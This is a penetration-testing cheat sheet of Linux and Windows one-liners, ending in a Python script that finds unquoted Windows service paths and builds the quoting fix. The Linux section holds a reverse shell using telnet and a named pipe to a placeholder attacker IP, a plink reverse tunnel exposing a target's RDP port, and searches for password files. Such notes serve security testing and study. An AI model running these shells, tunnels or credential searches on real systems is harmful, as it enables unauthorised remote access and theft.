- LINUX
- Grepping multiple strings: egrep -i "string1|string2" - e.g. nmap -sV -p21 10.0.0.* --open |egrep -i "report|open"
- Creating ip lists: for i in `seq 1 255`;do echo 192.168.1.$i;done >ips.txt
- Switching to previous directory: cd -
- Switching to home directory: cd
- Creating shortcut commands: alias netstat='netstat -antp' or even make up your own commands, e.g. alias makeips='for i in `seq 1 255`;do echo 192.168.1.$i;done'
- Viewing installed software:
- Debian based: dpkg --get-selections
- RPM based distributions (RHEL, Fedora Core, CentOS, SUSE Linux etc): rpm -qa
- Searching for Information:
- find / -name 'passw*' - Search for filenames starting with passw (quote the pattern so the shell does not expand it first)
- find / -type f -print0 2>/dev/null | xargs -0 grep -l passw - Search for files that contain passw in them (-print0/-0 keeps filenames with spaces intact).
- man -k <search_string> (e.g. man -k ftp) - lists all man pages that refer to ftp.
- Reverse netcat shell without netcat:
- Attacker: nc -lvp 1234
- Target: mknod backpipe p && telnet <ATTACKERIP> 1234 0<backpipe | /bin/bash 1>backpipe
- Reverse SSH tunnel:
- setup ssh: service ssh start && sshd-generate
- upload plink to target:
- create reverse tunnel: plink.exe -l root -pw <your ssh pass> -R 3389:127.0.0.1:3389 <attackerIP> (will map targets rdp port to yours)
- rdp into yourself to access target: rdesktop 127.0.0.1 -f
- Finding open egress ports: nmap open.zorinaq.com
- Open all HTTP hosts on network in firefox: for i in $(nmap -p80 -n 192.168.0.* --open |grep report |cut -d" " -f5);do firefox -new-tab $i;done (have firefox open before running)
- Simple Web Server: python -m SimpleHTTPServer (Python 2; with Python 3 use python3 -m http.server)
- copying files via scp: scp *.txt <targetip>:
- WINDOWS
- quick ping sweep: for /L %i in (1,1,255) do @ping -n 1 192.168.1.%i |findstr TTL
- Finding unquoted service paths: wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
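The wmic/findstr one-liner above only drops paths that start with a quote or live under C:\Windows, so it also reports unquoted paths that contain no spaces and are therefore harmless. As an added example (not part of the original notes), the Python below does the check properly for an audit: it parses wmic's fixed-width table using the header's column offsets, flags only services whose unquoted executable path actually contains a space, and builds the `sc config` command an administrator would run to quote the path. The wmic output, service names and paths are constructed for the example, not captured from a real host.

```python
import re


def _row(name, display, path, mode):
    # Emulate wmic's fixed-width columns so the sample stays aligned.
    return f"{name:<12}{display:<19}{path:<50}{mode}"


# Constructed sample of "wmic service get name,displayname,pathname,startmode"
# output (made-up services). Real wmic output is UTF-16LE with \r\r\n line
# endings; decode it first, the blank-line filter below handles the rest.
SAMPLE_WMIC_OUTPUT = "\n".join([
    _row("Name", "DisplayName", "PathName", "StartMode"),
    _row("Spooler", "Print Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    _row("GoodSvc", "Good Service", r'"C:\Program Files\Good Vendor\good.exe" -service', "Auto"),
    _row("BadSvc", "Bad Service", r"C:\Program Files\Bad Vendor\bad service.exe -svc", "Auto"),
    _row("ManualSvc", "Manual Service", r"C:\Program Files\Some Vendor\manual.exe", "Manual"),
    _row("NoSpaceSvc", "No Space Service", r"C:\Tools\nospace.exe -flag", "Auto"),
])


def parse_wmic_table(text):
    """Parse a wmic table into dicts, slicing each line at the header's column starts."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    header, body = lines[0], lines[1:]
    cols = [(m.group(), m.start()) for m in re.finditer(r"\S+", header)]
    rows = []
    for line in body:
        row = {}
        for i, (col, start) in enumerate(cols):
            end = cols[i + 1][1] if i + 1 < len(cols) else None
            row[col] = line[start:end].strip()
        rows.append(row)
    return rows


def service_executable(pathname):
    """Return the executable part of an unquoted PathName, or None if it is quoted.

    The service control manager hands the whole string to CreateProcess, which
    resolves an unquoted path with spaces by trying each space-separated prefix
    (C:\\Program.exe, C:\\Program Files\\Bad.exe, ...). Heuristic: the executable
    ends at the first ".exe" token.
    """
    p = pathname.strip()
    if not p or p.startswith('"'):
        return None
    m = re.match(r"(.*?\.exe)(?=\s|$)", p, re.IGNORECASE)
    return m.group(1) if m else p.split()[0]


def is_unquoted_with_spaces(pathname):
    exe = service_executable(pathname)
    return exe is not None and " " in exe


def find_unquoted_service_paths(wmic_text, auto_only=True):
    """Return [(Name, PathName)] for services whose unquoted executable path has a space."""
    hits = []
    for row in parse_wmic_table(wmic_text):
        if auto_only and row["StartMode"].lower() != "auto":
            continue
        if is_unquoted_with_spaces(row["PathName"]):
            hits.append((row["Name"], row["PathName"]))
    return hits


def remediation_command(name, pathname):
    """Build the sc.exe command that quotes the executable (the fix for the finding).

    sc.exe requires the space after "binPath=" and the inner quotes escaped as \\".
    """
    exe = service_executable(pathname)
    args = pathname.strip()[len(exe):].strip()
    quoted = f'\\"{exe}\\"' + (f" {args}" if args else "")
    return f'sc config {name} binPath= "{quoted}"'


if __name__ == "__main__":
    for name, path in find_unquoted_service_paths(SAMPLE_WMIC_OUTPUT):
        print(f"{name}: {path}")
        print("  fix:", remediation_command(name, path))
```

Only BadSvc is reported from the sample: GoodSvc is already quoted, NoSpaceSvc is unquoted but has no space in its path, and ManualSvc is skipped unless `auto_only=False`. Because the check looks at spaces rather than at the directory, the C:\Windows exclusion from the one-liner is unnecessary.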